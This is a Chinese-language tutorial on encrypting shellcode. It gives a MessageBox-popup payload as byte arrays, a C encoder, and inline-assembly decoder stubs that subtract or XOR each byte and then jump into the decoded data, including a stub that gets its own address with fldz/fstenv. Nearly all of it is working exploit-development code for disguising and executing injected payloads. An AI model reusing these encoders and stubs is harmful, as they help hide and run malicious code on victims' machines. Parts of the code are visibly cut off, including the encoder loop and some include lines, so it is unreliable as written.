对shellcode 进行加密:
#include "stdio.h"
char popup_general[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90";//shellcode should be ended with 0x90
void encoder (char* input, unsigned char key, int display_flag)// bool display_flag
{
int i=0,len=0;
FILE * fp;
unsigned char * output;
len = strlen(input);
output=(unsigned char *)malloc(len+1);
if(!output)
{
printf("memory erro!\n");
exit(0);
}
//encode the shellcode
for(i=0;i
对shellcode进行解密 并运行
unsigned char data[] =
"\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e"
"\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55"
"\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d"
"\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97"
"\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b"
"\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c"
"\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77"
"\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05"
"\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd"
"\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52"
"\x55\x01\x59\xfe\x55\x01\x59\xfa\x92";
__asm
{
lea eax,data
xor ecx,ecx
noop:
mov bl, [eax+ecx]
sub bl,2
mov [eax+ecx],bl
inc ecx
cmp bl, 0x90
jnz noop
push eax
ret
}
}
发现能运行后 再将它改为这样:
unsigned char data[] =
"\x83\xC0\x14"// ADD EAX,14
"\x33\xC9" // XOR ECX,ECX
"\x8A\x1C\x08" // MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xEB\x02" // SUB BL,2
"\x88\x1C\x08" // MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" // INC ECX
"\x80\xFB\x90" // CMP BL,90
"\x75\xF1"// JNZ SHORT shellcod.00401165
"\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e"
"\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55"
"\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d"
"\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97"
"\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b"
"\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c"
"\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77"
"\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05"
"\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd"
"\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52"
"\x55\x01\x59\xfe\x55\x01\x59\xfa\x92\x90";
__asm
{
lea eax,data
push eax
ret
}
}
shellcode加解密完成
但是一般会遇到各种情况 ,比如 插入的shellcode前面还有代码 那么 这段我们加密的shellcode就不是在最前端,那么加密的顺序就会出错 因为上面有 add eax,14
经修改 可以作为在shellcode的中间段 :
#include "stdafx.h"
#include
unsigned char data[] =
"\xD9\xEE" // fldz
"\xD9\x74\x24\xF4" // fstenv (28-byte) ptr ss:[esp-0xC]
"\x58" //pop eax 得到EIP 转载至http://www.programlife.net/shellcode-getpc.html
"\x83\xC0\x1b" //add eax,0x19
"\x33\xC9" // XOR ECX,ECX
"\x8A\x1C\x08" // MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x11" //xor bl,0x11
"\x88\x1C\x08" // MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" // INC ECX
"\x80\xFB\x90" // CMP BL,90
"\x75\xF1"// JNZ SHORT shellcod.00401165
//The above is 25 bytes
//The following is 169 bytes
"\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d"
"\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42"
"\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a"
"\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84"
"\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48"
"\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b"
"\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64"
"\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12"
"\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca"
"\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41"
"\x42\xee\x46\xed\x42\xee\x46\xe9\x81";//#panda0#
int main()
{
__asm
{
lea eax,data
push eax
ret
}
return 0;
}